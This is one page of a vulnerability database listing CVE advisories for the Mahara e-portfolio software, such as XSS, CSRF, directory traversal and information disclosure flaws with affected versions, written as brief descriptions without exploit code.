VYPR

Mahara

by Mahara (software)

Source repositories

CVEs (110)

  • CVE-2021-40848Nov 3, 2021
    risk 0.00cvss epss 0.01

    In Mahara before 20.04.5, 20.10.3, 21.04.2, and 21.10.0, exported CSV files could contain characters that a spreadsheet program could interpret as a command, leading to execution of a malicious string locally on a device, aka CSV injection.

  • CVE-2021-43264Nov 2, 2021
    risk 0.00cvss epss 0.01

    In Mahara before 20.04.5, 20.10.3, 21.04.2, and 21.10.0, adjusting the path component for the page help file allows attackers to bypass the intended access control for HTML files via directory traversal. It replaces the - character with the / character.

  • CVE-2021-43265Nov 2, 2021
    risk 0.00cvss epss 0.01

    In Mahara before 20.04.5, 20.10.3, 21.04.2, and 21.10.0, certain tag syntax could be used for XSS, such as via a SCRIPT element.

  • CVE-2021-43266Nov 2, 2021
    risk 0.00cvss epss 0.01

    In Mahara before 20.04.5, 20.10.3, 21.04.2, and 21.10.0, exporting collections via PDF export could lead to code execution via shell metacharacters in a collection name. Additional, in Mahara before 20.10.4, 21.04.3, and 21.10.1, exporting collections via PDF export could cause…

  • CVE-2021-29349Mar 31, 2021
    risk 0.00cvss epss 0.02

    Mahara 20.10 is affected by Cross Site Request Forgery (CSRF) that allows a remote attacker to remove inbox-mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft a module/multirecipientnotification/inbox.php…

  • CVE-2020-15907Aug 7, 2020
    risk 0.00cvss epss 0.01

    In Mahara 19.04 before 19.04.6, 19.10 before 19.10.4, and 20.04 before 20.04.1, certain places could execute file or folder names containing JavaScript.

  • CVE-2020-9387Apr 30, 2020
    risk 0.00cvss epss 0.01

    In Mahara 19.04 before 19.04.5 and 19.10 before 19.10.3, account details are shared in the Elasticsearch results for accounts that are not accessible when the config setting 'Isolated institutions' is turned on.

  • CVE-2020-9386Mar 9, 2020
    risk 0.00cvss epss 0.01

    In Mahara 18.10 before 18.10.5, 19.04 before 19.04.4, and 19.10 before 19.10.2, file metadata information is disclosed to group members in the Elasticsearch result list despite them not having access to that artefact anymore.

  • CVE-2020-9282Mar 9, 2020
    risk 0.00cvss epss 0.01

    In Mahara 18.10 before 18.10.5, 19.04 before 19.04.4, and 19.10 before 19.10.2, certain personal information is discoverable inspecting network responses on the 'Edit access' screen when sharing portfolios.

  • CVE-2013-1426Nov 7, 2019
    risk 0.00cvss epss 0.01

    Cross-site Scripting (XSS) in Mahara before 1.5.9 and 1.6.x before 1.6.4 allows remote attackers to inject arbitrary web script or HTML via the TinyMCE editor.

  • CVE-2019-9708May 7, 2019
    risk 0.00cvss epss 0.01

    An issue was discovered in Mahara 17.10 before 17.10.8, 18.04 before 18.04.4, and 18.10 before 18.10.1. A site administrator can suspend the system user (root), causing all users to be locked out from the system.

  • CVE-2019-9709May 7, 2019
    risk 0.00cvss epss 0.01

    An issue was discovered in Mahara 17.10 before 17.10.8, 18.04 before 18.04.4, and 18.10 before 18.10.1. The collection title is vulnerable to Cross Site Scripting (XSS) due to not escaping it when viewing the collection's SmartEvidence overview page (if that feature is turned…

  • CVE-2013-4432May 19, 2014
    risk 0.00cvss epss 0.01

    Mahara before 1.5.13, 1.6.x before 1.6.8, and 1.7.x before 1.7.4 does not properly restrict access to folders, which allows remote authenticated users to read arbitrary folders (1) by leveraging an active folder tab loaded before permissions were removed or (2) via the folder…

  • CVE-2013-4431May 19, 2014
    risk 0.00cvss epss 0.01

    Mahara before 1.5.12, 1.6.x before 1.6.7, and 1.7.x before 1.7.3 does not properly prevent access to blocks, which allows remote authenticated users to modify arbitrary blocks via the bock id in an edit request.

  • CVE-2013-4430May 19, 2014
    risk 0.00cvss epss 0.01

    Cross-site scripting (XSS) vulnerability in Mahara before 1.5.12, 1.6.x before 1.6.7, and 1.7.x before 1.7.3 allows remote attackers to inject arbitrary web script or HTML via the Host header to lib/web.php.

  • CVE-2013-4429May 19, 2014
    risk 0.00cvss epss 0.01

    Mahara before 1.5.12, 1.6.x before 1.6.7, and 1.7.x before 1.7.3 does not properly restrict access to artefacts, which allows remote authenticated users to read arbitrary artefacts via the (1) artefact id in an upload action when creating a journal or (2)…

  • CVE-2012-6037Nov 24, 2012
    risk 0.00cvss epss 0.02

    Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4, and other versions including 1.2, allow remote attackers to inject arbitrary web script or HTML via a CSV header with "unknown fields," which are not properly handled in…

  • CVE-2012-2253Nov 24, 2012
    risk 0.00cvss epss 0.02

    Cross-site scripting (XSS) vulnerability in group/members.php in Mahara 1.5.x before 1.5.7 and 1.6.x before 1.6.2 allows remote attackers to inject arbitrary web script or HTML via the query parameter.

  • CVE-2012-2247Nov 24, 2012
    risk 0.00cvss epss 0.02

    Cross-site scripting (XSS) vulnerability in Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4 allows remote attackers to inject arbitrary web script or HTML via vectors related to artefact/file/ and a crafted SVG file.

  • CVE-2012-2246Nov 24, 2012
    risk 0.00cvss epss 0.01

    Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4 allows remote attackers to conduct clickjacking attacks to delete arbitrary users and bypass CSRF protection via account/delete.php.

Page 4 of 6